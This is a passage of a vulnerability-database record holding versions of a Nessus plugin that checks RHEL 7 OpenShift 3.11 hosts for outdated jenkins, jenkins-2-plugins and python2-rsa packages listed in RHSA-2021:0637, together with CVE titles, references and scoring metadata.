script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11979\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 59, 79, 200, 377, 385, 502, 611, 770, 862, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-rsa\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_3_11_el7': [\n 'rhel-7-server-ose-3.11-debug-rpms',\n 'rhel-7-server-ose-3.11-rpms',\n 'rhel-7-server-ose-3.11-source-rpms'\n ]\n};\n\nrepo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE || empty_or_null(repo_sets)) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\npkgs = [\n {'reference':'jenkins-2-plugins-3.11.1612862361-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'jenkins-2.263.3.1612433584-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'python2-rsa-4.5-3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets);\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / jenkins-2-plugins / python2-rsa');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:python2-rsa", "p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T03:29:36", "differentElements": ["cpe", "cvelist", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "REDHAT-RHSA-2021-0637.NASL", "hash": "e8f3e584e08cddfd8a8fd6bca6b418cc", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-03-03T00:00:00", "modified": "2021-07-26T00:00:00", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147013", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.redhat.com/1925159", "https://bugzilla.redhat.com/1895947", "https://access.redhat.com/errata/RHSA-2021:0637", "https://cwe.mitre.org/data/definitions/79.html", "https://access.redhat.com/security/cve/CVE-2020-25658", "https://bugzilla.redhat.com/1925141", "https://bugzilla.redhat.com/1925140", "https://bugzilla.redhat.com/1895945", "https://bugzilla.redhat.com/1895939", "https://bugzilla.redhat.com/1925161", "https://cwe.mitre.org/data/definitions/59.html", "https://bugzilla.redhat.com/1925143", "https://bugzilla.redhat.com/1925156", "https://bugzilla.redhat.com/1837444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2306", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25658", "https://access.redhat.com/security/cve/CVE-2020-2308", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://cwe.mitre.org/data/definitions/385.html", "https://bugzilla.redhat.com/1925160", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2020-2305", "https://bugzilla.redhat.com/1925157", "https://cwe.mitre.org/data/definitions/502.html", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://access.redhat.com/security/cve/CVE-2021-21605", "https://access.redhat.com/security/cve/CVE-2021-21607", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11979", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2307", "https://cwe.mitre.org/data/definitions/863.html", "https://access.redhat.com/security/cve/CVE-2020-2307", "https://bugzilla.redhat.com/1895941", "https://access.redhat.com/security/cve/CVE-2021-21606", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2304", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2020-2306", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2305", "https://bugzilla.redhat.com/1925151", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://access.redhat.com/security/cve/CVE-2020-2309", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://cwe.mitre.org/data/definitions/200.html", "https://access.redhat.com/security/cve/CVE-2020-2304", "https://cwe.mitre.org/data/definitions/611.html", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1895946", "https://bugzilla.redhat.com/1903702", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/862.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1945", "https://bugzilla.redhat.com/1889972", "https://bugzilla.redhat.com/1895940", "https://cwe.mitre.org/data/definitions/377.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://cwe.mitre.org/data/definitions/20.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2308", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://access.redhat.com/security/cve/CVE-2021-21610"], "cvelist": ["CVE-2020-1945", "CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-11979", "CVE-2020-25658"], "immutableFields": [], "lastseen": "2021-08-05T12:52:56", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2020-25658", "RH:CVE-2021-21611", "RH:CVE-2020-2306", "RH:CVE-2021-21607", "RH:CVE-2020-1945", "RH:CVE-2020-2307", "RH:CVE-2021-21605", "RH:CVE-2021-21609", "RH:CVE-2021-21606", "RH:CVE-2020-2309", "RH:CVE-2021-21610", "RH:CVE-2021-21608", "RH:CVE-2020-2308", "RH:CVE-2020-11979", "RH:CVE-2021-21603", "RH:CVE-2020-2305", "RH:CVE-2021-21604", "RH:CVE-2020-2304", "RH:CVE-2021-21602"]}, {"type": "redhat", "idList": ["RHSA-2021:0637", "RHSA-2021:0038", "RHSA-2021:0039", "RHSA-2020:5634", "RHSA-2021:0034", "RHSA-2021:0719", "RHSA-2020:2618", "RHSA-2021:0282", "RHSA-2021:0037", "RHSA-2021:0423"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2021-0034.NASL", "GENTOO_GLSA-202011-18.NASL", "EULEROS_SA-2021-1133.NASL", "REDHAT-RHSA-2021-0038.NASL", "FEDORA_2020-2640AA4E19.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "FEDORA_2020-92B1D001B3.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1945", "UB:CVE-2020-25658", "UB:CVE-2020-11979"]}, {"type": "cve", "idList": ["CVE-2020-2305", "CVE-2020-2304", "CVE-2020-2309", "CVE-2020-25658", "CVE-2020-2306", "CVE-2020-2308", "CVE-2020-1945", "CVE-2020-11979", "CVE-2020-2307"]}, {"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202012-5"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9", "GHSA-XRX6-FMXQ-RJJ2"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "fedora", "idList": ["FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF", "FEDORA:52396606732B", "FEDORA:6869030D3139"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877930", "OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2021", "ORACLE:CPUAPR2021", "ORACLE:CPUJUL2021", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020"]}], "modified": "2021-08-05T12:52:56", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-08-05T12:52:56", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147013", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0637. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147013);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/26\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-2304\",\n \"CVE-2020-2305\",\n \"CVE-2020-2306\",\n \"CVE-2020-2307\",\n \"CVE-2020-2308\",\n \"CVE-2020-2309\",\n \"CVE-2020-11979\",\n \"CVE-2020-25658\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0637\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/385.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/611.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/862.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2305\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2307\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0637\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889972\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895939\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895941\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11979\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 59, 79, 200, 377, 385, 502, 611, 770, 862, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-rsa\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_3_11_el7': [\n 'rhel-7-server-ose-3.11-debug-rpms',\n 'rhel-7-server-ose-3.11-rpms',\n 'rhel-7-server-ose-3.11-source-rpms'\n ]\n};\n\nrepo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE || empty_or_null(repo_sets)) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\npkgs = [\n {'reference':'jenkins-2-plugins-3.11.1612862361-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'jenkins-2.263.3.1612433584-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'python2-rsa-4.5-3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets);\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / jenkins-2-plugins / python2-rsa');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": [], "solution": "Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.", "nessusSeverity": "", "cvssScoreSource": "CVE-2020-11979", "vpr": {"risk factor": "Medium", "score": "6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-03T00:00:00", "vulnerabilityPublicationDate": "2020-05-14T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-05T12:52:56", "differentElements": ["cpe"], "edition": 7}, {"bulletin": {"id": "REDHAT-RHSA-2021-0637.NASL", "hash": "336d83bb8b0295ee15d6c677d21aad85", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the 